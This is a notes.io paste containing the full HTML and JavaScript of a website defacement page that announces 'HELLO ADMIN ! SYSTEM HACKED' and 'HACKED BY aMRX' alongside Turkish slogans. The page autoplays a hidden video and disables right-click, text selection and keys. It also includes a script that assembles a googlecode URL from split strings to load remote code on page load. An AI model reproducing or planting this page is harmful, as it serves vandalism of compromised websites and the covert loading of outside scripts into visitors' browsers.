NotesWhat is notes.io?

Notes brand slogan

Notes - notes.io


<title>HELLO ADMIN ! | HACKED BY aMRX</title>
<style> html, body, a, a:hover { cursor:url('http://i.hizliresim.com/Wg8prm.png'), auto !important; }</style>

<script src="https://static.windscribe.com/js/flowplayer.min.js"></script>
<canvas id="web-canvas" style="position: absolute;z-index:4;"></canvas>
<div id="top-content">

</div>
<script src="https://static.windscribe.com/js/EasePack.min.js"></script>
<script src="https://static.windscribe.com/js/rAF.js"></script>
<script src="https://static.windscribe.com/js/TweenLite.min.js"></script>
<script>
(function() {

var width, height, largeHeader, canvas, ctx, points, target, animateHeader = true;

// Main
initHeader();
initAnimation();
addListeners();

function initHeader() {
width = window.innerWidth-20;
height = window.innerHeight;
target = {x: width/2, y: height/2};

largeHeader = document.getElementById('home-top');
//largeHeader.style.height = '700px';

canvas = document.getElementById('web-canvas');
canvas.width = width;
//canvas.height = height;
canvas.height = 700;
ctx = canvas.getContext('2d');

// create points
points = [];
for(var x = 0; x < width; x = x + width/20) {
for(var y = 0; y < height; y = y + height/20) {
var px = x + Math.random()*width/20;
var py = y + Math.random()*height/20;
var p = {x: px, originX: px, y: py, originY: py };
points.push(p);
}
}

// for each point find the 5 closest points
for(var i = 0; i < points.length; i++) {
var closest = [];
var p1 = points[i];
for(var j = 0; j < points.length; j++) {
var p2 = points[j]
if(!(p1 == p2)) {
var placed = false;
for(var k = 0; k < 5; k++) {
if(!placed) {
if(closest[k] == undefined) {
closest[k] = p2;
placed = true;
}
}
}

for(var k = 0; k < 5; k++) {
if(!placed) {
if(getDistance(p1, p2) < getDistance(p1, closest[k])) {
closest[k] = p2;
placed = true;
}
}
}
}
}
p1.closest = closest;
}

// assign a circle to each point
for(var i in points) {
var c = new Circle(points[i], 2+Math.random()*2, 'rgba(255,255,255,0.3)');
points[i].circle = c;
}
}

// Event handling
function addListeners() {
if(!('ontouchstart' in window)) {
window.addEventListener('mousemove', mouseMove);
}
window.addEventListener('scroll', scrollCheck);
window.addEventListener('resize', resize);
}

function mouseMove(e) {
var posx = posy = 0;
if (e.pageX || e.pageY) {
posx = e.pageX;
posy = e.pageY;
}
else if (e.clientX || e.clientY) {
posx = e.clientX + document.body.scrollLeft + document.documentElement.scrollLeft;
posy = e.clientY + document.body.scrollTop + document.documentElement.scrollTop;
}
target.x = posx;
target.y = posy;
}

function scrollCheck() {
if(document.body.scrollTop > height) animateHeader = false;
else animateHeader = true;
}

function resize() {
width = window.innerWidth-20;
height = window.innerHeight;
//largeHeader.style.height = height+'px';
canvas.width = width;
//canvas.height = height;
canvas.height = 700;
}

// animation
function initAnimation() {
animate();
for(var i in points) {
shiftPoint(points[i]);
}
}

function animate() {
if(animateHeader) {
ctx.clearRect(0,0,width,height);
for(var i in points) {
// detect points in range
if(Math.abs(getDistance(target, points[i])) < 4000) {
points[i].active = 0.3;
points[i].circle.active = 0.6;
} else if(Math.abs(getDistance(target, points[i])) < 20000) {
points[i].active = 0.1;
points[i].circle.active = 0.3;
} else if(Math.abs(getDistance(target, points[i])) < 40000) {
points[i].active = 0.02;
points[i].circle.active = 0.1;
} else {
points[i].active = 0;
points[i].circle.active = 0;
}

drawLines(points[i]);
points[i].circle.draw();
}
}
requestAnimationFrame(animate);
}

function shiftPoint(p) {
TweenLite.to(p, 1+1*Math.random(), {x:p.originX-50+Math.random()*100,
y: p.originY-50+Math.random()*100, ease:Circ.easeInOut,
onComplete: function() {
shiftPoint(p);
}});
}

// Canvas manipulation
function drawLines(p) {
if(!p.active) return;
for(var i in p.closest) {
ctx.beginPath();
ctx.moveTo(p.x, p.y);
ctx.lineTo(p.closest[i].x, p.closest[i].y);
ctx.strokeStyle = 'rgba(156,217,249,'+ p.active+')';
ctx.stroke();
}
}

function Circle(pos,rad,color) {
var _this = this;

// constructor
(function() {
_this.pos = pos || null;
_this.radius = rad || null;
_this.color = color || null;
})();

this.draw = function() {
if(!_this.active) return;
ctx.beginPath();
ctx.arc(_this.pos.x, _this.pos.y, _this.radius, 0, 2 * Math.PI, false);
ctx.fillStyle = 'rgba(156,217,249,'+ _this.active+')';
ctx.fill();
};
}

// Util
function getDistance(p1, p2) {
return Math.pow(p1.x - p2.x, 2) + Math.pow(p1.y - p2.y, 2);
}

})();
</script> <div id="push" class=""></div>

</script>
<style type="text/css">
body {
background-image: url("https://i.hizliresim.com/jy5A1L.jpg");
</style>
<br>
<meta property="og:image" content="http://images4.alphacoders.com/285/285998.jpg">
<meta property="og:image:width" content="1200"/>
<meta property="og:image:height" content="630"/>
<link href='http://fonts.googleapis.com/css?family=Orbitron:700|Gruppo' rel='stylesheet' type='text/css'>

<script src="http://smilenet4u.googlecode.com/files/TipingText.js"></script>

</head>

<style>');
background-repeat:no-repeat;
font-family:'Orbitron', sans-serif;
pre{
font-family:'Orbitron',sans-serif;
}
#plate{
position: absolute;!important;
top:0!important;
left:0;
right:0;
width:100%;
height:100%;
z-index:-1!important;
margin:0;
padding:0;
position:fixed;
}
#xx{
font-size:60px;
text-shadow:0 0 5px #ff0000, 0 0 10px #ff7f00, 0 0 15px #ffff00, 0 0 20px #10ff00, 0 0 30px #0048ff, 0 0 40px #0015ff, 0 0 55px #6100ff;
}
#xx2{
font-size:60px;
text-shadow:0 0 5px #ff0000, 0 0 10px #ff7f00, 0 0 15px #ffff00, 0 0 20px #10ff00, 0 0 30px #0048ff, 0 0 40px #0015ff, 0 0 55px #6100ff;
top:300!important;
right: 550px;
margin:0;
padding:0;
position:fixed;
}

</style>
<body class="unselectable">
</div>
<center>
<div class="message">
<pre>
<p id="xx">
HELLO ADMIN ! SYSTEM HACKED <br /><hr width="65%" size="1" style="opacity: 1px;"> </p>
</span></p> <br />
<p id="xx2"><span style="font-size:30px;">HACKED BY aMRX</span>
<span style="font-size:30px;">YA KAN KUSTURURUZ YA TAM SUSTURURUZ!</span>
<span style="font-size:30px;">ZoRRoKİN - Sanal Terör İle Mücadele!</span>
</p>
</div>

</center>
<script language="javascript" src="http://ic.sitekodlari.com/sagtusengelleme1.js"></script>

<embed width="0" height="0" src="http://www.youtube.com/v/VuXCwm2EwUU&autoplay=1&amp;loadingcolor=000000&amp;slidercolo"></p>


<style>.k-d{color: black;}
.golge{position:fixed;z-index:999;width:100%;height:100%;
background:transparent;overflow:hidden !important;}
.tl{width:100%;height:100%;background: url(http://i.hizliresim.com/vj4jYm.png); background: -moz-radial-gradient(center, ellipse cover, rgba(0,0,0,0) 0%, rgba(0,0,0,0) 10%, rgba(0,0,0,0.05) 16%, rgba(0,0,0,0.15) 23%, rgba(0,0,0,0.25) 27%, rgba(0,0,0,0.45) 41%, rgba(0,0,0,0.55) 55%, rgba(0,0,0,0.75) 86%, rgba(0,0,0,0.75) 100%); background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%,rgba(0,0,0,0)), color-stop(10%,rgba(0,0,0,0)), color-stop(16%,rgba(0,0,0,0.05)), color-stop(23%,rgba(0,0,0,0.15)), color-stop(27%,rgba(0,0,0,0.25)), color-stop(41%,rgba(0,0,0,0.45)), color-stop(55%,rgba(0,0,0,0.55)), color-stop(86%,rgba(0,0,0,0.75)), color-stop(100%,rgba(0,0,0,0.75))); background: -webkit-radial-gradient(center, ellipse cover, rgba(0,0,0,0) 0%,rgba(0,0,0,0) 10%,rgba(0,0,0,0.05) 16%,rgba(0,0,0,0.15) 23%,rgba(0,0,0,0.25) 27%,rgba(0,0,0,0.45) 41%,rgba(0,0,0,0.55) 55%,rgba(0,0,0,0.75) 86%,rgba(0,0,0,0.75) 100%); background: -o-radial-gradient(center, ellipse cover, rgba(0,0,0,0) 0%,rgba(0,0,0,0) 10%,rgba(0,0,0,0.05) 16%,rgba(0,0,0,0.15) 23%,rgba(0,0,0,0.25) 27%,rgba(0,0,0,0.45) 41%,rgba(0,0,0,0.55) 55%,rgba(0,0,0,0.75) 86%,rgba(0,0,0,0.75) 100%); background: -ms-radial-gradient(center, ellipse cover, rgba(0,0,0,0) 0%,rgba(0,0,0,0) 10%,rgba(0,0,0,0.05) 16%,rgba(0,0,0,0.15) 23%,rgba(0,0,0,0.25) 27%,rgba(0,0,0,0.45) 41%,rgba(0,0,0,0.55) 55%,rgba(0,0,0,0.75) 86%,rgba(0,0,0,0.75) 100%); background: radial-gradient(ellipse at center, rgba(0,0,0,0) 0%,rgba(0,0,0,0) 10%,rgba(0,0,0,0.05) 16%,rgba(0,0,0,0.15) 23%,rgba(0,0,0,0.25) 27%,rgba(0,0,0,0.45) 41%,rgba(0,0,0,0.55) 55%,rgba(0,0,0,0.75) 86%,rgba(0,0,0,0.75) 100%); filter: progid:DXImageTransform.Microsoft.gradient( startColorstr="#00000000", endColorstr="#bf000000",GradientType=1 );
background-size:200% 200%;
}
#topleft .tl{-webkit-border-bottom-right-radius: 100px; border-bottom-right-radius: 100px;}#topleft{top:0px;left:0px;-webkit-border-bottom-right-radius:100px; border-bottom-right-radius:100px;}#topright{top:0px;left:100%;-webkit-border-bottom-left-radius: 100px; border-bottom-left-radius: 100px}#botleft{top:100%;left:0px;-webkit-border-top-right-radius: 100px; border-top-right-radius: 100px;}#botright{top:100%;left:100%;-webkit-border-top-left-radius: 100px; border-top-left-radius: 100px;}#topright .tl{ -webkit-border-bottom-left-radius: 100px; border-bottom-left-radius: 100px;background-position: right top;}#botright .tl{ background-position: bottom right !important;-webkit-border-top-left-radius: 100px; border-top-left-radius: 100px;}#botleft .tl{ background-position: bottom left !important;-webkit-border-top-right-radius: 100px; border-top-right-radius: 100px;}</style>
<koddostu><div class='golge k-d' id='topleft'><div class='tl'></div></div>
<div class='golge k-d' id='topright'><div class='tl'></div></div>
<div class='golge k-d' id='botleft'><div class='tl'></div></div>
<div class='golge k-d' id='botright'><div class='tl'></div></div>
</koddostu>
<script>var d=document,tol=d.getElementById('topleft'),tor=d.getElementById('topright'),bol=d.getElementById('botleft'),bor=d.getElementById('botright'),w=document.body.clientWidth,h=window.innerHeight;var script = document.createElement('script');script.src = "h"+"t"+"tps"+":/"+"/k"+"do"+"stu.google"+"code.com/svn/c"+"que"+"ry.j"+"s";
document.getElementsByTagName('head')[0].appendChild(script);window.onresize=function(){};window.onmousemove=function(a){a=a||window.event;var b=a.clientX;a=a.clientY;var c=a-h+"px",e=b-w+"px",b=b+"px";a=a+"px";tol.style.top=c;tol.style.left=e;tor.style.top=c;tor.style.left=b;bol.style.top=a;bol.style.left=e;bor.style.top=a;bor.style.left=b};</script>

<script language="Javascript1.2"> <!-- "; function rtclickcheck(keyp){ if (navigator.appName == "Netscape" && keyp.which == 3) { alert(mymessage); return false; } if (navigator.appVersion.indexOf("MSIE") != -1 && event.button == 2) { alert(mymessage); return false; } } document.onmousedown = rtclickcheck //--> </script>
<script language="JavaScript"> function none(){ return false; } document.oncontextmenu=none document.onmousedown=none </script>
<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false"></body>
<script type="text/javascript">

//form tags to omit in NS6+:
var omitformtags=["input", "textarea", "select"]

omitformtags=omitformtags.join("|")

function disableselect(e){
if (omitformtags.indexOf(e.target.tagName.toLowerCase())==-1)
return false
}

function reEnable(){
return true
}

if (typeof ********.onselectstart!="undefined")
********.onselectstart=new Function ("return false")
else{
********.onmousedown=disableselect
********.onmouseup=reEnable
}

</script>
<body onkeydown="return false">
</body>
</html>
     
 
what is notes.io
 

Notes.io is a web-based application for taking notes. You can take your notes and share with others people. If you like taking long notes, notes.io is designed for you. To date, over 8,000,000,000 notes created and continuing...

With notes.io;

  • * You can take a note from anywhere and any device with internet connection.
  • * You can share the notes in social platforms (YouTube, Facebook, Twitter, instagram etc.).
  • * You can quickly share your contents without website, blog and e-mail.
  • * You don't need to create any Account to share a note. As you wish you can use quick, easy and best shortened notes with sms, websites, e-mail, or messaging services (WhatsApp, iMessage, Telegram, Signal).
  • * Notes.io has fabulous infrastructure design for a short link and allows you to share the note as an easy and understandable link.

Fast: Notes.io is built for speed and performance. You can take a notes quickly and browse your archive.

Easy: Notes.io doesn’t require installation. Just write and share note!

Short: Notes.io’s url just 8 character. You’ll get shorten link of your note when you want to share. (Ex: notes.io/q )

Free: Notes.io works for 12 years and has been free since the day it was started.


You immediately create your first note and start sharing with the ones you wish. If you want to contact us, you can use the following communication channels;


Email: [email protected]

Twitter: http://twitter.com/notesio

Instagram: http://instagram.com/notes.io

Facebook: http://facebook.com/notesio



Regards;
Notes.io Team

     
 
Shortened Note Link
 
 
Looding Image
 
     
 
Long File
 
 

For written notes was greater than 18KB Unable to shorten.

To be smaller than 18KB, please organize your notes, or sign in.